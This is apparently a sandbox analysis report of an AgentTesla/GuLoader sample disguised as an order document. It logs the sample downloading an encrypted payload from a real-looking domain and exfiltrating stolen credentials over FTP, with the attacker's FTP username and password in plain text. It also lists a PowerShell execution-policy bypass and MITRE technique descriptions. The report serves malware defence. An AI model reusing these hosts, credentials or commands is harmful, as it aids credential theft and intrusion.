Dec 2, 2024 11:36:12.642076015 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.643840075 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.643887043 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.643950939 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.644000053 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.645739079 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.645781994 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.645848989 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.645921946 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.647612095 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.647655964 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.647726059 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.647768021 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.649481058 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.649523973 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.649544001 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.649580002 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.651355982 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.651407003 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.651441097 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.651482105 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.653193951 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.653237104 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.653281927 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.653325081 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.655030012 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.655092955 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.655128002 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.655168056 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.656820059 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.656877995 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.656908035 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.656968117 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.658680916 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.658724070 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.658766985 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.658807039 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:12.660415888 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:12.660456896 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:14.620249987 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:14.740334988 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:14.740664959 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:15.976186037 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:15.976421118 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:16.096420050 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:16.401093960 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:16.401365995 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:16.521436930 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:16.883939981 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:16.884299994 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:17.004460096 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:17.314496040 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:17.314687967 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:17.434612036 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:17.739521027 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:17.739729881 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:17.859668970 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:18.172656059 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:18.172842026 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:18.483267069 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:18.535564899 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:18.603463888 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:18.840609074 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:18.841341019 CET	49738	35334	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:18.889482021 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:18.961319923 CET	35334	49738	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:18.961420059 CET	49738	35334	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:18.961505890 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:19.081429005 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:20.105631113 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:20.106118917 CET	49738	35334	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:20.106118917 CET	49738	35334	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:20.155169964 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:20.226174116 CET	35334	49738	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:20.226537943 CET	35334	49738	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:20.226619959 CET	49738	35334	192.168.2.4	86.107.36.93
Dec 2, 2024 11:36:20.535051107 CET	21	49737	86.107.36.93	192.168.2.4
Dec 2, 2024 11:36:20.577001095 CET	49737	21	192.168.2.4	86.107.36.93
Dec 2, 2024 11:37:17.040368080 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:37:17.040452003 CET	49736	80	192.168.2.4	185.33.55.26

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 11:36:09.850991964 CET	59221	53	192.168.2.4	1.1.1.1
Dec 2, 2024 11:36:10.418071985 CET	53	59221	1.1.1.1	192.168.2.4
Dec 2, 2024 11:36:13.888487101 CET	54795	53	192.168.2.4	1.1.1.1
Dec 2, 2024 11:36:14.615451097 CET	53	54795	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 2, 2024 11:36:09.850991964 CET	192.168.2.4	1.1.1.1	0x53d5	Standard query (0)	akonnyuszerkezet.hu	A (IP address)	IN (0x0001)	false
Dec 2, 2024 11:36:13.888487101 CET	192.168.2.4	1.1.1.1	0xc885	Standard query (0)	ftp.carbognin.it	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 2, 2024 11:36:10.418071985 CET	1.1.1.1	192.168.2.4	0x53d5	No error (0)	akonnyuszerkezet.hu		185.33.55.26	A (IP address)	IN (0x0001)	false
Dec 2, 2024 11:36:14.615451097 CET	1.1.1.1	192.168.2.4	0xc885	No error (0)	ftp.carbognin.it		86.107.36.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

akonnyuszerkezet.hu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	185.33.55.26	80	7856	\Device\CdRom1\Objedn vka_20248481119000903.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 11:36:10.543442011 CET	206	OUT	GET /image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: akonnyuszerkezet.hu Cache-Control: no-cache
Dec 2, 2024 11:36:11.831723928 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 02 Dec 2024 10:36:11 GMT Content-Type: application/octet-stream Content-Length: 241728 Connection: keep-alive Last-Modified: Mon, 02 Dec 2024 06:34:18 GMT ETag: "d220021-3b040-62843bcf7b24f" Accept-Ranges: bytes Data Raw: d3 e4 54 bc b3 47 a6 c2 a4 52 10 05 05 9c fb e6 04 60 5e a0 44 7a 89 4c 61 8a e9 3f 8a 98 ea 61 4d 0b 9f 45 f3 80 ab ea 10 dc 32 f7 5d 9a fd c7 94 a8 c2 54 78 e9 c7 9e f4 a7 20 24 a4 d1 ed fd d5 e7 c3 58 44 be 55 78 c4 01 4b 30 08 80 0f 6c 57 ec 61 1f 71 1d 2d 0c 59 44 02 33 2a d2 6c f8 de f5 e2 f7 4a 61 93 61 2e f4 d6 22 3c e5 44 5e b7 ba 3c e9 db 9c a2 76 38 32 ca 9a 89 32 eb 4e d1 50 5f 33 96 a4 df 5a d3 76 89 c2 42 cb 0e 47 bf 84 af ff 55 77 c9 4e ac 44 02 0b f2 d7 58 7e e6 e0 f9 fa 76 1c c6 97 1c 47 5d 1e b5 55 87 4a 74 86 75 e6 83 33 0b f8 bd 66 e6 fb 98 50 ee 9b 63 a5 17 cd 61 ec 37 7a 6b c1 20 98 a1 05 40 92 3c ab 4d fa 37 0d 6a 15 e7 12 9f 6e ce 04 60 02 a2 ac 60 68 3d 5f 0e c9 2e 69 f1 31 08 86 76 58 88 7e 5e 3c df ad ff 49 97 8f 06 49 5e 2e 10 f7 4e 75 9e 7c 48 40 cd 9b 7f 54 46 20 bf a3 29 65 69 9c a8 a2 1a 46 ca b4 64 f2 31 f1 ec b4 32 26 ed 6e 0c 4a b7 d0 a1 bc bc 96 7c d5 96 55 bc 06 49 87 a7 bf a9 52 68 5a e7 52 20 93 3e ed a2 7c 26 cf 0e 82 be 1b 68 67 d4 85 a3 5a c0 ed ce 42 ed 04 [TRUNCATED] Data Ascii: TGR`^DzLa?aME2]Tx $XDUxK0lWaq-YD3lJaa."<D^<v822NP_3ZvBGUwNDX~vG]UJtu3fPca7zk @<M7jn``h=_.i1vX~^<II^.Nu\|H@TF )eiFd12&nJ\|UIRhZR >\|&hgZB{u[{w8973(kvS$gzqWcq rxd\|j.f-d+yScqloomPQ/ec=so@-IMOwHm}S:Z>M/WL6mcrRLckJ^#RP?#G[CRV-FJ/A;Y]P4K piQ\|$s>,Pp 3f-!oR~GfV=!/(S:}a/:m=n7"'\|eadE'[Y>+pa,%Gg-b:c\|_77/5r!d(D1O&1p6D1tJnMA5\|.VG_o[=:(Y1"9.mi \>+:\|jetXf2.8%\|cBi#hV1g
Dec 2, 2024 11:36:11.831749916 CET	1236	IN	Data Raw: 43 b7 70 d0 82 22 f7 55 07 64 d6 62 83 98 b5 d2 fb 46 f2 0c e8 8d b7 65 d6 30 45 32 f6 e7 9f d7 9a 44 95 72 b5 d2 11 77 c3 64 e0 2e b0 3e 61 01 af 59 74 86 91 11 bc f1 6e cf 02 10 82 fc 98 ee d6 b2 31 af d8 ac 88 b5 2e 3d f8 e3 6c 27 bd f2 87 ad Data Ascii: Cp"UdbFe0E2Drwd.>aYtn1.=l'p0Hic\|85}o@^$a]FlRn9z5#u!1O+>]y2eG"}uv VQxMl~1O*X1=sB<qoY)D
Dec 2, 2024 11:36:11.831760883 CET	712	IN	Data Raw: a1 a9 8f d8 0f 21 80 f1 9d 3d e9 f1 71 70 f3 46 8f cb 25 fb 8e 8f 4b 47 72 91 a4 2f 4d 2f 67 b2 b6 49 61 37 2e e9 ae 0d 1b 01 82 e9 40 cb de 22 4d c7 3d 14 23 f4 0c 1e 48 ae 6c 57 71 80 3d 70 48 3a 89 5e 3d af 94 22 5e d4 05 b0 2d ba 0e f2 4c a2 Data Ascii: !=qpF%KGr/M/gIa7.@"M=#HlWq=pH:^="^-L#^-x5f}cA>J*Pvr?8#G]i)tV)d`--{yYCjt9!qpm:1"mJs.Zj.1!cc%TDI
Dec 2, 2024 11:36:11.831842899 CET	1236	IN	Data Raw: 63 a8 a5 22 79 ba 20 90 09 20 5d f8 5b d6 1e d6 c6 4b 91 26 bd 1d 66 1f 0e c4 5b 1c ad c6 ce 9d d0 76 22 34 a2 d8 96 31 cf c5 3d de bd 0b 48 6f 3c a3 d6 cf 45 f3 ac c8 6f 98 b3 8c 3b 57 d2 dc c2 e5 aa 46 fb bc 16 be 8a 6a 05 b9 ca ce 32 a6 05 bb Data Ascii: c"y ][K&f[v"41=Ho<Eo;WFj2"IZfvV=F1uptA$P )G,BrmC3l6Ke[_Bowv?pb\|J&[++}9H0ZirzTupte4~4Um`_Eon!jGcn0$o{y^Rx=
Dec 2, 2024 11:36:11.831887960 CET	1236	IN	Data Raw: 0e 1c 1a 0d 09 11 51 d1 33 15 89 b2 e9 ea 7c f5 d6 8f fd f5 ec d0 c1 a6 d0 90 ca 9e b7 0b 73 c6 26 de fd 9f 97 51 01 f9 06 73 08 92 04 c1 b2 f3 75 32 66 29 23 f9 d2 22 0d 52 60 99 08 ef 27 2f 41 0f c3 51 43 8e 09 01 98 23 65 6e 91 3a b5 2f d3 6e Data Ascii: Q3\|s&Qsu2f)#"R`'/AQC#en:/n6<jnd;5J,:<M@IAe8cx6:G"KEwf;Q}QSOB&\9!t*\|iMY1qz,:6X]rM7z6De( P,Ft
Dec 2, 2024 11:36:11.831902027 CET	1236	IN	Data Raw: 55 3e d7 e8 d2 46 58 47 b4 f7 86 cc 00 4b 10 f5 7f 0f 6c 9d fd 61 1f 01 bf d3 00 18 44 22 30 2a d2 6c d0 c8 f5 e2 fd b4 6f 91 61 d0 f9 d4 22 4e f0 44 5e c7 92 2b e9 db 96 00 88 34 33 ca ba 0d 32 eb 4e ad 2c e5 3d e6 b2 28 9b f3 ce a0 96 8f ea 50 Data Ascii: U>FXGKlaD"0loa"ND^+432N,=(P]<.hVn!.34jlP7zd=@<}Nc`h9-0<7]6}SJI^,bJuL[WF ?eiRD4`Cn@>hEe
Dec 2, 2024 11:36:11.831912041 CET	1236	IN	Data Raw: 24 99 e3 d5 f3 c3 01 6a 73 38 c5 dd e1 31 93 c5 43 44 d9 f8 78 5a 80 b9 27 f6 4a 1a 07 ab 9d 10 78 9e e5 bf a9 67 a2 f2 55 52 7c 34 ad 4b ad 5d fa 62 8c e8 3f 10 52 1c c1 6a af 4e db ba 6f 55 c4 7f 8d fc b3 1c 20 c7 9a b9 22 97 72 23 79 fd 03 0b Data Ascii: $js81CDxZ'JxgUR\|4K]b?RjNoU "r#yRzCu35IeVODs[CxS%w~$CVP>Hzf^wiMdy'xN,>-cP fW=dlfSU`qxh>
Dec 2, 2024 11:36:11.832129002 CET	1236	IN	Data Raw: 51 69 59 9f 98 3e 8f 45 c2 27 a2 38 1c 0f 2b 19 cb 40 ad c9 69 8e 7f 57 0a a6 72 ce 55 0c fd cf 8d 0d ce 9d 12 2c 64 56 c3 cb 5d fb 19 97 cb bb fe 71 a9 9b 3a d1 a7 eb c1 ab b6 65 98 c9 f8 7f 2a 0a f4 9d 44 24 6b 19 24 d7 de 7c fc e3 0c 1c f7 ff Data Ascii: QiY>E'8+@iWrU,dV]q:eD$k$\|oM0\|\|c(`7^:m+n="P]^,Z_Th%NEOn3APZ6\|eq70T]"3m`$Pc,`A,`7i
Dec 2, 2024 11:36:11.832139969 CET	1236	IN	Data Raw: 34 ed 13 94 6e 30 ac 62 02 a2 5a 6c 69 3d 7f 09 c9 30 ac 0c 30 31 a3 76 58 88 a6 58 3c df ad 87 9f 69 50 f9 b7 52 2c 10 df 52 75 9e 76 62 40 cd 98 4b 57 46 4e be a3 29 64 69 bc bd 82 1a 44 ca b4 9a fc 31 f1 d6 ee 73 a3 ed 6e e2 46 b7 c0 81 bb bc Data Ascii: 4n0bZli=001vXX<iPR,Ruvb@KWFN)diD1snFl+\|IRnR \|keX=cub{lM8J9?(]evS$SfzqSc.x`\jPf)+5RSHql`onP
Dec 2, 2024 11:36:11.832149982 CET	1236	IN	Data Raw: 9b 5e 20 9d c4 75 0e ac 03 e6 ed ce de 8f f0 69 de 5e e6 c0 c2 78 da 13 56 13 bf 86 13 74 6b 70 ae ab 9a aa c3 1f 5f c1 e0 30 14 d2 69 8a a1 db dd 8b 27 9d 0d f7 66 3c 94 f7 f3 f3 64 fd 0e 6a 8f 6c ed 98 f8 68 74 01 ab eb cb 9e 2a 94 22 90 71 d9 Data Ascii: ^ ui^xVtkp_0i'f<djlht*"qq2BH \y,CU5NV-{&G3^^Tb^Zs!4w{q(s\|H:Qii,h`zoP1LRY"Ml X7y.n
Dec 2, 2024 11:36:11.951905966 CET	1236	IN	Data Raw: 2a c7 a6 9c 5f bc 16 77 68 b6 23 64 75 65 4d 19 a5 20 f0 6d 3a c1 62 ce 39 e7 99 4d 50 4e 54 c9 f0 7d 4c e2 71 37 29 00 09 31 da 8e 01 1b 54 ea 31 e4 db 27 18 02 fa 03 13 1d 41 63 0c 5f 6e f8 28 d7 7d 28 f2 50 25 62 d2 61 8f 5b ba a0 00 bf 26 2d Data Ascii: *_wh#dueM m:b9MPNT}Lq7)1T1'Ac_n(}(P%ba[&-`%dK{n5@#_\|'=x"=Ui6ZY=2j56gR@m=r5 +X1@>>}LF2(Y

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 2, 2024 11:36:15.976186037 CET	21	49737	86.107.36.93	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Dec 2, 2024 11:36:15.976421118 CET	49737	21	192.168.2.4	86.107.36.93	USER server@carbognin.it
Dec 2, 2024 11:36:16.401093960 CET	21	49737	86.107.36.93	192.168.2.4	331 User server@carbognin.it OK. Password required
Dec 2, 2024 11:36:16.401365995 CET	49737	21	192.168.2.4	86.107.36.93	PASS 59Cif8wZUH#X
Dec 2, 2024 11:36:16.883939981 CET	21	49737	86.107.36.93	192.168.2.4	230 OK. Current restricted directory is /
Dec 2, 2024 11:36:17.314496040 CET	21	49737	86.107.36.93	192.168.2.4	504 Unknown command
Dec 2, 2024 11:36:17.314687967 CET	49737	21	192.168.2.4	86.107.36.93	PWD
Dec 2, 2024 11:36:17.739521027 CET	21	49737	86.107.36.93	192.168.2.4	257 "/" is your current location
Dec 2, 2024 11:36:17.739729881 CET	49737	21	192.168.2.4	86.107.36.93	TYPE I
Dec 2, 2024 11:36:18.172656059 CET	21	49737	86.107.36.93	192.168.2.4	200 TYPE is now 8-bit binary
Dec 2, 2024 11:36:18.172842026 CET	49737	21	192.168.2.4	86.107.36.93	PASV
Dec 2, 2024 11:36:18.483267069 CET	49737	21	192.168.2.4	86.107.36.93	PASV
Dec 2, 2024 11:36:18.840609074 CET	21	49737	86.107.36.93	192.168.2.4	227 Entering Passive Mode (86,107,36,93,138,6)
Dec 2, 2024 11:36:18.961505890 CET	49737	21	192.168.2.4	86.107.36.93	STOR PW_user-116938_2024_12_02_05_36_12.html
Dec 2, 2024 11:36:20.105631113 CET	21	49737	86.107.36.93	192.168.2.4	150 Accepted data connection
Dec 2, 2024 11:36:20.535051107 CET	21	49737	86.107.36.93	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.429 seconds (measured here), 0.73 Kbytes per second

Target ID:	0
Start time:	05:35:22
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:35:22
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:35:22
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
Imagebase:	0xe90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:35:26
Start date:	02/12/2024
Path:	\Device\CdRom1\Objedn vka_20248481119000903.exe
Wow64 process (32bit):	true
Commandline:	"E:\Objedn vka_20248481119000903.exe"
Imagebase:	0x400000
File size:	1'009'888 bytes
MD5 hash:	FFC86DFE93F81BCE26A2B4D2D818B167
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1997234959.000000000358F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:35:57
Start date:	02/12/2024
Path:	\Device\CdRom1\Objedn vka_20248481119000903.exe
Wow64 process (32bit):	true
Commandline:	"E:\Objedn vka_20248481119000903.exe"
Imagebase:	0x400000
File size:	1'009'888 bytes
MD5 hash:	FFC86DFE93F81BCE26A2B4D2D818B167
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2939013791.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2939013791.0000000034E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2939013791.0000000034E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
